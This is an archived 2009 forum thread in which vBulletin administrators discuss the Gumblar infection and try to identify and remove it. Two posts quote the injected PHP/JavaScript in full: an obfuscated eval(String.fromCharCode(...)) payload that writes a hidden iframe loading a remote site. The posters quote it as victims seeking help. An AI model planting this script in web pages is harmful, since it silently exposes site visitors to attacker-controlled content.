View Full Version : Gumblar Virus - Stupid thing!
RedSpiral
05-15-2009, 03:24 PM
I've just had a client whose vbulletin was infected by gumblar.
Read the article.
http://uk.news.yahoo.com/16/20090515/ttc-gumblar-attack-explodes-across-the-w-6315470.html
I spent an hour or 2 trying to get rid of it but no luck...so had to do a fresh install luckly board was new but still this virus is so annoying!
silvermerc
05-16-2009, 02:52 PM
Is this the code;
?>
<?php echo ''; ?><?php echo ''; ?><?php echo '<script
type="text/javascript">eval(String.fromCharCode(118,97,114,32,106,104,106 ,61,52,50,52,52,52,51,59,118,97,114,32,104,106,103 ,50,50,61,34,99,111,112,121,34,59,118,97,114,32,11 9,61,34,111,34,59,118,97,114,32,114,101,54,61,34,1 08,105,115,116,46,34,59,118,97,114,32,114,114,116, 116,54,61,34,99,111,109,34,59,118,97,114,32,97,61, 34,105,102,34,59,118,97,114,32,115,61,34,116,116,3 4,59,100,111,99,117,109,101,110,116,46,119,114,105 ,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32 ,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47 ,39,43,104,106,103,50,50,43,39,39,43,119,43,39,39, 43,114,101,54,43,39,39,43,114,114,116,116,54,43,39 ,47,39,43,39,34,32,119,105,100,116,104,61,34,49,34 ,32,104,101,105,103,104,116,61,34,50,34,62,60,47,1 05,39,43,39,102,39,43,39,114,97,109,101,62,39,41,5 9,118,97,114,32,104,103,52,61,50,51,49,49,50,51))</script>';
?>'
I seem to be getting infected by that :{
RedSpiral
05-16-2009, 06:38 PM
Is this the code;
?>
<?php echo ''; ?><?php echo ''; ?><?php echo '<script
type="text/javascript">eval(String.fromCharCode(118,97,114,32,106,104,106 ,61,52,50,52,52,52,51,59,118,97,114,32,104,106,103 ,50,50,61,34,99,111,112,121,34,59,118,97,114,32,11 9,61,34,111,34,59,118,97,114,32,114,101,54,61,34,1 08,105,115,116,46,34,59,118,97,114,32,114,114,116, 116,54,61,34,99,111,109,34,59,118,97,114,32,97,61, 34,105,102,34,59,118,97,114,32,115,61,34,116,116,3 4,59,100,111,99,117,109,101,110,116,46,119,114,105 ,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32 ,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47 ,39,43,104,106,103,50,50,43,39,39,43,119,43,39,39, 43,114,101,54,43,39,39,43,114,114,116,116,54,43,39 ,47,39,43,39,34,32,119,105,100,116,104,61,34,49,34 ,32,104,101,105,103,104,116,61,34,50,34,62,60,47,1 05,39,43,39,102,39,43,39,114,97,109,101,62,39,41,5 9,118,97,114,32,104,103,52,61,50,51,49,49,50,51))</script>';
?>'
I seem to be getting infected by that :{
whats your forum url?
To know its its gumblar go to your forum and in the status bar it should say loading from gumblar.cn
But yes I think you might gumblar.
Dismounted
05-17-2009, 03:14 AM
If that's being placed directly into your files - you may have a bigger problem than just that...
silvermerc
05-21-2009, 11:58 PM
it spreads through files -cry
file url is in my profile :}
raiderlax
05-22-2009, 04:12 AM
How does a forum even get infected with this?
silvermerc
05-22-2009, 05:28 AM
Its has the priorities to be confiker aswel btw thats the problem
vBulletin® v3.8.12 by vBS, Copyright ©2000-2025, vBulletin Solutions Inc.